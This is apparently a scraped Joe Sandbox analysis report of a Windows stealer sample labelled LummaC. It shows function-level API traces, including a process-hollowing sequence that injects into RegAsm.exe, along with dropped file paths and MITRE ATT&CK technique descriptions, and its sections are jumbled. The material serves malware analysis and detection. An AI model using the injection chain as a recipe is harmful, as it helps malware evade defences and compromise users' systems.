Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: pc$zc
API String ID: 1269201914-3652032699
Opcode ID: 7f666ff8967ffbc2e897dbb8aa187462a91ea5076e862254a4e7ddcfa1d284f3
Instruction ID: aa6f50b31b44eb7f33fb81f5a8cc3d236061e873f662890b466e541cb40d4723
Opcode Fuzzy Hash: 7f666ff8967ffbc2e897dbb8aa187462a91ea5076e862254a4e7ddcfa1d284f3
Instruction Fuzzy Hash: CAB012C1659240FC3144A1141C12C37014FC0C4F61F30812EFC05C01C2D8414D0505B3

Function 0063E455 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E467

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

Uc, xrefs: 0063E455
zc, xrefs: 0063E461

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: Uc$zc
API String ID: 1269201914-778484526
Opcode ID: 659fb3f8de90fba827c3b022cb08ac874cb1d10957f511a913cc38d348e729fd
Instruction ID: 0831a952be7be74c00d7f988af85a1463a5f1cf26533e7e23a457523cb26eee0
Opcode Fuzzy Hash: 659fb3f8de90fba827c3b022cb08ac874cb1d10957f511a913cc38d348e729fd
Instruction Fuzzy Hash: A8B012D1658200BC310421101D12C37020FC0C0F25F30C12EFA01D40C2D8420F0604B2

Analysis Process: physmeme.exePID: 1196, Parent PID: 1476COMMON

Execution Graph

Execution Coverage:	45%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	37.5%
Total number of Nodes:	16
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 02892129 Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0289209B,0289208B), ref: 02892298
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 028922AB
Wow64GetThreadContext.KERNEL32(00000098,00000000), ref: 028922C9
ReadProcessMemory.KERNELBASE(0000008C,?,028920DF,00000004,00000000), ref: 028922ED
VirtualAllocEx.KERNELBASE(0000008C,?,?,00003000,00000040), ref: 02892318
WriteProcessMemory.KERNELBASE(0000008C,00000000,?,?,00000000,?), ref: 02892370
WriteProcessMemory.KERNELBASE(0000008C,00400000,?,?,00000000,?,00000028), ref: 028923BB
WriteProcessMemory.KERNELBASE(0000008C,?,?,00000004,00000000), ref: 028923F9
Wow64SetThreadContext.KERNEL32(00000098,04ED0000), ref: 02892435
ResumeThread.KERNELBASE(00000098), ref: 02892444

Strings

SetThreadContext, xrefs: 0289224F
Load, xrefs: 02892167
TerminateProcess, xrefs: 02892327
GetP, xrefs: 028921AB
ress, xrefs: 028921B3
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 02892297
CreateProcessA, xrefs: 028921DD
aryA, xrefs: 0289216F
ResumeThread, xrefs: 02892265
VirtualAlloc, xrefs: 028921F0
ReadProcessMemory, xrefs: 02892216
WriteProcessMemory, xrefs: 0289223C
VirtualAllocEx, xrefs: 02892229
GetThreadContext, xrefs: 02892203

Memory Dump Source

Source File: 0000000A.00000002.1380972675.0000000002891000.00000040.00000800.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2891000_physmeme.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-1257834847
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: 037ca3a8e8430e398cf0a9003a21436f045356f5f093942131b969992a5ff8f2
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: E4B1E47660028AAFDB60CF68CC80BDA77A5FF88714F158524EA0CEB345D774FA518B94

Function 00F40510 Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,03893590,?,00000001,0000012C), ref: 00F41074

Memory Dump Source

Source File: 0000000A.00000002.1380835285.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f40000_physmeme.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b2f90017465caadd2851485728af7b20de073aec08f2d4fb1347aa2eee0e84f1
Instruction ID: fb9a3a6abbdc2b458340177b2ad9ef4b1d6d0c159a8d878caba998483d8495d3
Opcode Fuzzy Hash: b2f90017465caadd2851485728af7b20de073aec08f2d4fb1347aa2eee0e84f1
Instruction Fuzzy Hash: 4421FFB5D00259EFCB10DF9AD884ADEFFB4FB48320F10812AE918A7250D375A954CFA5

Analysis Process: RegAsm.exePID: 1512, Parent PID: 1196COMMON

Execution Graph

Execution Coverage:	0.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.7%
Total number of Nodes:	42
Total number of Limit Nodes:	4

Executed Functions

Function 0040F7B0 Relevance: 9.1, Strings: 7, Instructions: 390
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

6(>*, xrefs: 0040FB0D
IK, xrefs: 0040F90A
Ga!1, xrefs: 0040FAFD
=:li, xrefs: 0040FB05
MSO, xrefs: 0040F912
2$1., xrefs: 0040FB43, 0040FB4B
ZABC, xrefs: 0040F91A

Memory Dump Source

Source File: 0000000C.00000002.1398843696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 2$1.$6(>*$=:li$Ga!1$ZABC$IK$MSO
API String ID: 0-2205979412
Opcode ID: dc0af39f46735f6fc8810d8d65a432b1349a7db07c574dc9d39223abff83bc0b
Instruction ID: 8df93780a8b371d5a2a89ff6c21c9300b0c5160e97c6da9bd56ff8ebb28ea911
Opcode Fuzzy Hash: dc0af39f46735f6fc8810d8d65a432b1349a7db07c574dc9d39223abff83bc0b
Instruction Fuzzy Hash: 37D15A7050C3808BD321DF188490A5FBBE1AF96748F580D3EE4D5AB792D339D949CB9A

Function 00446730 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0041380D,?,00000001,?), ref: 0044675E

Memory Dump Source

Source File: 0000000C.00000002.1398843696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Function 0040D3C0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetInputState.USER32 ref: 0040D3D1
GetCurrentThreadId.KERNEL32 ref: 0040D3E6
GetCurrentProcessId.KERNEL32 ref: 0040D3EC
ExitProcess.KERNEL32 ref: 0040D5B0

Strings

clmn, xrefs: 0040D573, 0040D57B
ohij, xrefs: 0040D54E

Memory Dump Source

Source File: 0000000C.00000002.1398843696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Similarity

API ID: CurrentProcess$ExitInputStateThread
String ID: clmn$ohij
API String ID: 1029096631-3567580053
Opcode ID: 4c653ea9ada5344bda0104f52dcfa29158eed8f8ae5aa501a9de71a42c93f49e
Instruction ID: 8f1940826fa5e4ef35febcdafd7184f7e4a9353c3ce711b8b38eacab782ab196
Opcode Fuzzy Hash: 4c653ea9ada5344bda0104f52dcfa29158eed8f8ae5aa501a9de71a42c93f49e
Instruction Fuzzy Hash: C841397480D380ABD701AF99D544A1EFBE1AF52709F548C2DE4C4A7392C73AD8588B6B

Function 0040EE70 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 304
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(03EB01F7,00000000), ref: 0040EF62

Strings

9?, xrefs: 0040F288

Memory Dump Source

Source File: 0000000C.00000002.1398843696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID: 9?
API String ID: 1029625771-1150883898
Opcode ID: 891c2fb76147fcbfd660747e054fe51af3fae1d98f06ff880934904054e5e699
Instruction ID: 42b0cf5b6e489c6646c3492ae048cf3f7af35fd27ce82f5d7ffdcfcc6bce275d
Opcode Fuzzy Hash: 891c2fb76147fcbfd660747e054fe51af3fae1d98f06ff880934904054e5e699
Instruction Fuzzy Hash: 81B1ACB0408380EBD311DF15FD4166BBBE1EBC6709F45083DE484AB262E7399958DB6B

Function 00445294 Relevance: 1.6, APIs: 1, Instructions: 76
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800), ref: 0044530C

Memory Dump Source

Source File: 0000000C.00000002.1398843696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a5ab4fafe27626d2c8abd12efacffb37336a606f183b878775e77db83958384e
Instruction ID: 32cf0169799236ea817639a585a2fb97fc7d0b73a9cb276cd4531836bf098fa6
Opcode Fuzzy Hash: a5ab4fafe27626d2c8abd12efacffb37336a606f183b878775e77db83958384e
Instruction Fuzzy Hash: 4031C375D04296AFDB00CFA8D8502ADFFB1BB15341F684459D440B7352C734AB15CFA9

Function 00443160 Relevance: 1.6, APIs: 1, Instructions: 51
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(6A69686F,00000000,?), ref: 004431D3

Memory Dump Source

Source File: 0000000C.00000002.1398843696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: b531817381292eac37c55a32594c5c078c22521a7b44cc151e322e869f1473ef
Instruction ID: 154aceb0a70e2b1c6176248329647f15dfba9260395587bf241fc84468e2c486
Opcode Fuzzy Hash: b531817381292eac37c55a32594c5c078c22521a7b44cc151e322e869f1473ef
Instruction Fuzzy Hash: E501693050C250DBD301AF18E958A0ABBF4EF4AB02F454C68E4C49B362D33ADD24CB9A

Function 00443142 Relevance: 1.5, APIs: 1, Instructions: 7
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 00443148

Memory Dump Source

Source File: 0000000C.00000002.1398843696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1d7f40c18e52b896ede2ec4de930e2bbf0d7d1e9d6beaefe7b6dc95e471b35e6
Instruction ID: f2ee8ec3101e335420bd073388b79e1bdf2823782e18275de44ef30affdbbf4e
Opcode Fuzzy Hash: 1d7f40c18e52b896ede2ec4de930e2bbf0d7d1e9d6beaefe7b6dc95e471b35e6
Instruction Fuzzy Hash: 3CB012300401209BC5141B05FC09F823F209F40661F110060F004480F2C15189A5C5E8

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report gh3zRWl4or.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Edge\61a52ddc9dd915

C:\Edge\L6lFlVnd0szYUYb26bZc.vbe

C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat

C:\Edge\msedge.exe

C:\Program Files (x86)\Microsoft\Edge\Application\CSC1C41CCC2AAF942199E65A42A37D1FE2.TMP

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

C:\Users\user\AppData\Local\3e80c92b4a3ad6

C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe

Windows Analysis Report
gh3zRWl4or.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre